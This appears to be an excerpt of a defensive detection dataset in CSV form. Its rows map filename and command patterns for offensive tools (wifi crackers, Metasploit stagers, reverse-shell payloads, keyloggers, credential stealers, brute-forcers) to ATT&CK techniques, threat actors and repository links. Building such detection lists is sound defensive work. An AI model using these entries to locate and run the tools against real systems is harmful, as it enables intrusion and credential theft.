"*wietze/Invoke-ArgFuscator*",".{0,1000}wietze\/Invoke\-ArgFuscator.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","62580"
"*wifi/airpwn*",".{0,1000}wifi\/airpwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62581"
"*wifi/dnspwn*",".{0,1000}wifi\/dnspwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62582"
"*wifi_dos_own.py*",".{0,1000}wifi_dos_own\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","62583"
"*wifi_dos3.py*",".{0,1000}wifi_dos3\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","62584"
"*wifi_dump_linux*",".{0,1000}wifi_dump_linux.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","#linux","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","62585"
"*wifi_fake_auth.*",".{0,1000}wifi_fake_auth\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","62586"
"*WiFi_Hacker.ino*",".{0,1000}WiFi_Hacker\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","62587"
"*wifi_pineapple_csrf*",".{0,1000}wifi_pineapple_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62588"
"*wifi_recon_handshakes*",".{0,1000}wifi_recon_handshakes.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","62589"
"*wifibroot.py*",".{0,1000}wifibroot\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","62590"
"*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","network exploitation tool","N/A","10","1324","319","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z","62591"
"*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","network exploitation tool","N/A","10","1324","319","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z","62592"
"*wifidump.cna*",".{0,1000}wifidump\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","62593"
"*wifijammer*",".{0,1000}wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Exploitation tool","https://github.com/DanMcInerney/wifijammer","1","1","N/A","network exploitation tool","N/A","10","4082","790","2024-07-20T02:47:48Z","2014-01-26T07:54:39Z","62594"
"*WifiPasswords.ps1*",".{0,1000}WifiPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62595"
"*wifiphisher*",".{0,1000}wifiphisher.{0,1000}","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Framework","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","N/A","10","13758","2642","2025-02-04T21:04:05Z","2014-09-26T12:47:28Z","62596"
"*WiFi-Pumpkin*",".{0,1000}WiFi\-Pumpkin.{0,1000}","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","N/A","10","3121","722","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z","62597"
"*wifite --crack*",".{0,1000}wifite\s\-\-crack.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62598"
"*wifite --dict *.txt*",".{0,1000}wifite\s\-\-dict\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62599"
"*wifite -e *",".{0,1000}wifite\s\-e\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62600"
"*wifite --kill*",".{0,1000}wifite\s\-\-kill.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62601"
"*wifite --wep *",".{0,1000}wifite\s\-\-wep\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62602"
"*Wifite.py*",".{0,1000}Wifite\.py.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","1","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62603"
"*wifite2.git*",".{0,1000}wifite2\.git.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","1","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","62604"
"*Will add the user to the administrator group (0x220)*",".{0,1000}Will\sadd\sthe\suser\sto\sthe\sadministrator\sgroup\s\(0x220\).{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62606"
"*willfindlay/bpf-keylogger*",".{0,1000}willfindlay\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/willfindlay/bpf-keylogger","1","1","N/A","N/A","10","1","2","2","2020-01-13T20:17:02Z","2019-12-25T16:27:28Z","62607"
"*Win phpMyAdmin Hacked*",".{0,1000}Win\sphpMyAdmin\sHacked.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","62608"
"*Win.Countermeasure.KeeFarce*",".{0,1000}Win\.Countermeasure\.KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","62609"
"*Win.Tool.ADPassHunt-*",".{0,1000}Win\.Tool\.ADPassHunt\-.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","62614"
"*win_chrome_password_extractor.py*",".{0,1000}win_chrome_password_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","62619"
"*win_fake_malware.*",".{0,1000}win_fake_malware\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62620"
"*win_keylogger.py*",".{0,1000}win_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","62621"
"*win_rev_http.exe*",".{0,1000}win_rev_http\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","62622"
"*win_rev_https.exe*",".{0,1000}win_rev_https\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","62623"
"*win_rev_tcp.exe*",".{0,1000}win_rev_tcp\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","62624"
"*win_wlan_passwd_and_wanip_extractor.py*",".{0,1000}win_wlan_passwd_and_wanip_extractor\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","62625"
"*Win32:KFarce-C*",".{0,1000}Win32\:KFarce\-C.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","62648"
"*'Win32_Backdoor'*",".{0,1000}\'Win32_Backdoor\'.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","62650"
"*win32_stage_boot_reverse_shell_revert.asm*",".{0,1000}win32_stage_boot_reverse_shell_revert\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62652"
"*win32_stage_uploadexec.asm*",".{0,1000}win32_stage_uploadexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62653"
"*win32_stage_winexec.asm*",".{0,1000}win32_stage_winexec\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62654"
"*Win32kLeaker.*",".{0,1000}Win32kLeaker\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62655"
"*Win7Elevate.*",".{0,1000}Win7Elevate\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62673"
"*Win7ElevateDll.*",".{0,1000}Win7ElevateDll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62674"
"*WINAPI KaynLoader(*",".{0,1000}WINAPI\sKaynLoader\(.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","62675"
"*WinBruteLogon* -v -u*",".{0,1000}WinBruteLogon.{0,1000}\s\-v\s\-u.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62676"
"*WinBruteLogon.dpr*",".{0,1000}WinBruteLogon\.dpr.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62677"
"*WinBruteLogon.dproj*",".{0,1000}WinBruteLogon\.dproj.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","62678"
